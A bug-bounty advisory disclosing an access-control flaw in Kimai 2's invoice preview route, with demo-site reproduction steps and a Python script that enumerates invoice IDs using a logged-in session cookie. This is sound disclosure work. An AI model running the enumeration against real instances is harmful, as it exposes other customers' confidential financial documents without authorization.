Improper Access Control in kevinpapst/kimai2

Reported 2021-11-20 06:56:03 by haxatron on www.huntr.dev (huntr report A0C438FB-C8E1-40CF-ACC6-C8A532B80B93)

Tags: improper access control, kevinpapst/kimai2, authenticated users, invoices, sensitive financial information, bugbounty

EPSS: 0.001 (percentile 26.1%)

Description

Authenticated users can preview invoices to which they have no read access. The invoice preview route does not check whether the requesting user is allowed to see the invoice it is asked to render, so any logged-in account can fetch other customers' invoice documents by ID.

Proof of Concept

To demonstrate this vulnerability, we use the tony_teamlead account on the public demo site.

1: Log in as tony_teamlead.

2: Open the Invoices page and note that no invoice document for Haley-Jaskolski is listed in the UI; this user has no read access to it.

3: Now, still as tony_teamlead, visit https://demo.kimai.org/en/invoice/preview/4/4 directly: the Haley-Jaskolski invoice document is rendered anyway. On the demo-stable instance the same user can visit https://demo-stable.kimai.org/en/invoice/preview/1/4 and see Crooks Group's document, which they likewise have no access to. (Note that the invoice IDs differ between the two demo instances.)

4: The preview route, https://demo.kimai.org/en/invoice/preview/{invoice_id}/{file_export_format}, performs no object-level authorization check against the requesting user, so an attacker can enumerate invoice_id upwards and downwards and retrieve invoice documents they are not permitted to see. The only prerequisite is a valid login; no elevated role is needed.
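As an added example (not code from the report or from the Kimai project), the enumeration in step 4 as a small Python script: it builds preview URLs from the route pattern the report quotes, fetches each one with a logged-in session, classifies the response, and lists the IDs that returned a document although they are not on the user's own Invoices page. Only the route pattern and the demo host come from the report; the Cookie-header session replay, the meaning assigned to each status code, the PHPSESSID cookie name and the offline response tables are assumptions for illustration, and the tables are constructed, not captured traffic.

```python
"""Enumerate invoice preview IDs as an authenticated Kimai user.

Added example for this report, not code from the report or the Kimai project.
From the report: the route pattern /en/invoice/preview/{invoice_id}/{file_export_format}
and the demo host. Assumptions for illustration: the session is replayed as a raw
Cookie header, 200 with a body means the document was rendered, and the response
tables below are constructed stand-ins rather than traffic captured from a server.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

# A fetcher maps a URL to (http_status, body_bytes).
Fetcher = Callable[[str], Tuple[int, bytes]]


def preview_url(base_url: str, invoice_id: int, file_export_format: str) -> str:
    """Build a preview URL from the route pattern quoted in the report."""
    return f"{base_url.rstrip('/')}/en/invoice/preview/{invoice_id}/{file_export_format}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: a bounce to the login page must show up as 3xx."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # urllib then raises HTTPError carrying the 3xx code


def make_session_fetcher(cookie_header: str, timeout: float = 10.0) -> Fetcher:
    """Live HTTP fetcher that replays a logged-in browser session.

    cookie_header is the Cookie header value copied from the browser after
    logging in (e.g. "PHPSESSID=..."; the cookie name is an assumption).
    """
    opener = urllib.request.build_opener(_NoRedirect())

    def fetch(url: str) -> Tuple[int, bytes]:
        req = urllib.request.Request(url, headers={"Cookie": cookie_header})
        try:
            with opener.open(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:  # 3xx/4xx/5xx land here
            return err.code, err.read()

    return fetch


def classify(status: int, body: bytes) -> str:
    """Interpret one response. A correct authorization check yields "denied"
    (or "missing" if the app hides existence); "document" on a foreign ID is the leak."""
    if status == 200 and body:
        return "document"
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "missing"
    if 300 <= status < 400:
        return "redirect"
    return f"other:{status}"


def enumerate_previews(base_url: str, invoice_ids: Iterable[int],
                       file_export_format: str, fetch: Fetcher) -> Dict[int, str]:
    """Step 4 of the PoC: walk a range of invoice_id values and classify each response."""
    return {i: classify(*fetch(preview_url(base_url, i, file_export_format)))
            for i in invoice_ids}


def unauthorized_ids(results: Dict[int, str], own_ids: Iterable[int]) -> List[int]:
    """IDs that rendered a document but are absent from the user's own Invoices page
    (step 2). A non-empty list is the access-control failure."""
    own = set(own_ids)
    return sorted(i for i, outcome in results.items()
                  if outcome == "document" and i not in own)


# Constructed offline stand-ins (not captured traffic). Invoice 2 belongs to the
# user; 1, 3 and 4 belong to other customers; 5 does not exist.
VULNERABLE_RESPONSES = {
    1: (200, b"%PDF-1.4 invoice for Crooks Group"),
    2: (200, b"%PDF-1.4 invoice for tony_teamlead's customer"),
    3: (200, b"%PDF-1.4 invoice for another customer"),
    4: (200, b"%PDF-1.4 invoice for Haley-Jaskolski"),
}
FIXED_RESPONSES = {
    1: (403, b"Access Denied"),
    2: (200, b"%PDF-1.4 invoice for tony_teamlead's customer"),
    3: (403, b"Access Denied"),
    4: (403, b"Access Denied"),
}


def make_table_fetcher(table: Dict[int, Tuple[int, bytes]]) -> Fetcher:
    """Offline fetcher that answers from a response table keyed by invoice_id."""
    def fetch(url: str) -> Tuple[int, bytes]:
        invoice_id = int(url.rsplit("/", 2)[-2])
        return table.get(invoice_id, (404, b""))
    return fetch


if __name__ == "__main__":
    base = "https://demo.kimai.org"
    for label, table in (("vulnerable", VULNERABLE_RESPONSES), ("fixed", FIXED_RESPONSES)):
        res = enumerate_previews(base, range(1, 6), "4", make_table_fetcher(table))
        print(label, res, "leaked:", unauthorized_ids(res, own_ids=[2]))
    # Against a live instance, pass make_session_fetcher("PHPSESSID=<copied>") instead.
```

The fetcher is injected so the same enumeration logic runs against the constructed tables offline and against a live instance with a real session; comparing the "vulnerable" and "fixed" runs shows what a patched server should return for a foreign ID (403, or 404 if it prefers not to confirm that the invoice exists).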

Impact

Any authenticated user, whatever their assigned permissions, can read invoice documents belonging to other customers and teams, exposing potentially sensitive financial information they are not authorized to view. Because the IDs are sequential, a single low-privileged account is enough to harvest every invoice on the instance.
